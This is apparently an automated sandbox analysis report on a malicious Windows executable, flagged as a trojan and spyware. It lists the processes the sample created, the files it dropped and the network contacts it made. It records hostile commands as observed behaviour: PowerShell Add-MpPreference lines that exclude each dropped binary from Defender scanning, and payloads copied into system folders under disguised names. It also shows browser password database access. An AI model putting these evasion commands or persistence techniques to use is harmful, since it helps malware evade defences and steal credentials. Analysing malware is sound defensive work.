                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003231000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002687000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, eTZddqfc.log.20.drString found in binary or memory: https://ipinfo.io/ip
                              Source: powershell.exe, 00000004.00000002.3359158340.00000218E52E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3375021893.0000021B53196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3420318873.00000203E2456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3163423208.000001B610076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: qmgr.db.31.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Windows\System32\r6Lr6XbTWt.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Windows\System32\r6Lr6XbTWt.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Windows\System32\0b28f23e034595Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMPJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9BAF17260_2_00007FFD9BAF1726
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9BAFF3480_2_00007FFD9BAFF348
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 20_2_00007FFD9B6F0D4820_2_00007FFD9B6F0D48
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 20_2_00007FFD9B6F0E4320_2_00007FFD9B6F0E43
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B74176830_2_00007FFD9B741768
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B710D4830_2_00007FFD9B710D48
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B710E4330_2_00007FFD9B710E43
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B72000030_2_00007FFD9B720000
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 32_2_00007FFD9B710D4832_2_00007FFD9B710D48
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 32_2_00007FFD9B710E4332_2_00007FFD9B710E43
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B70000033_2_00007FFD9B700000
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B6F0D4833_2_00007FFD9B6F0D48
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B6F0E4333_2_00007FFD9B6F0E43
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B72177C33_2_00007FFD9B72177C
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 34_2_00007FFD9B6E0D4834_2_00007FFD9B6E0D48
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 34_2_00007FFD9B6E0E4334_2_00007FFD9B6E0E43
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeCode function: 35_2_00007FFD9B73170E35_2_00007FFD9B73170E
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeCode function: 35_2_00007FFD9B71000035_2_00007FFD9B710000
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 36_2_00007FFD9B71170E36_2_00007FFD9B71170E
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 36_2_00007FFD9B6F000036_2_00007FFD9B6F0000
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 36_2_00007FFD9B6E0D4836_2_00007FFD9B6E0D48
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 36_2_00007FFD9B6E0E4336_2_00007FFD9B6E0E43
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 37_2_00007FFD9B70000037_2_00007FFD9B700000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 37_2_00007FFD9B6F0D4837_2_00007FFD9B6F0D48
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 37_2_00007FFD9B6F0E4337_2_00007FFD9B6F0E43
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 37_2_00007FFD9B72177C37_2_00007FFD9B72177C
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 39_2_00007FFD9B71000039_2_00007FFD9B710000
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 39_2_00007FFD9B73170E39_2_00007FFD9B73170E
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 40_2_00007FFD9B6F000040_2_00007FFD9B6F0000
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 40_2_00007FFD9B71170E40_2_00007FFD9B71170E
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 40_2_00007FFD9B6E0D4840_2_00007FFD9B6E0D48
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 40_2_00007FFD9B6E0E4340_2_00007FFD9B6E0E43
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 41_2_00007FFD9B72000041_2_00007FFD9B720000
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 41_2_00007FFD9B710D4841_2_00007FFD9B710D48
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 41_2_00007FFD9B710E4341_2_00007FFD9B710E43
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 41_2_00007FFD9B74176841_2_00007FFD9B741768
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeCode function: 42_2_00007FFD9B720D4842_2_00007FFD9B720D48
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeCode function: 42_2_00007FFD9B720E4342_2_00007FFD9B720E43
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CEHidmAX.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              Source: VQdUvAQ4xO.exe, 00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exe, 00000024.00000002.2486417871.0000000002F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exe, 00000024.00000002.2486417871.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exe, 0000002B.00000002.3049829663.0000000003581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exe, 0000002B.00000002.3049829663.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exe, 0000002B.00000002.3049829663.000000000364F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
                              Source: VQdUvAQ4xO.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: VQdUvAQ4xO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: mENvqiIeFx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 0eDO5Zbs.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: r6Lr6XbTWt.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: JOajDppbSkfqSPK1G9zAbH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.csCryptographic APIs: 'CreateDecryptor'
                              Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.csCryptographic APIs: 'CreateDecryptor'
                              Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.csCryptographic APIs: 'CreateDecryptor'
                              Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@53/92@3/4
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\NnjhOJZu.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-4J6ByaDz5UAU0y0XiBQ1
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\AppData\Local\Temp\dj5thqfbJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat"
                              Source: VQdUvAQ4xO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: VQdUvAQ4xO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 1oyAqbnMAq.29.dr, QN844X0EE4.29.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: VQdUvAQ4xO.exeVirustotal: Detection: 68%
                              Source: VQdUvAQ4xO.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile read: C:\Users\user\Desktop\VQdUvAQ4xO.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\VQdUvAQ4xO.exe "C:\Users\user\Desktop\VQdUvAQ4xO.exe"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknownProcess created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: unknownProcess created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: unknownProcess created: C:\Recovery\0eDO5Zbs.exe "C:\Recovery\0eDO5Zbs.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe"
                              Source: unknownProcess created: C:\Users\user\Desktop\VQdUvAQ4xO.exe "C:\Users\user\Desktop\VQdUvAQ4xO.exe"
                              Source: unknownProcess created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: unknownProcess created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: unknownProcess created: C:\Recovery\0eDO5Zbs.exe "C:\Recovery\0eDO5Zbs.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe"
                              Source: unknownProcess created: C:\Users\user\Desktop\VQdUvAQ4xO.exe "C:\Users\user\Desktop\VQdUvAQ4xO.exe"
                              Source: unknownProcess created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: unknownProcess created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: secur32.dllJump to behavior
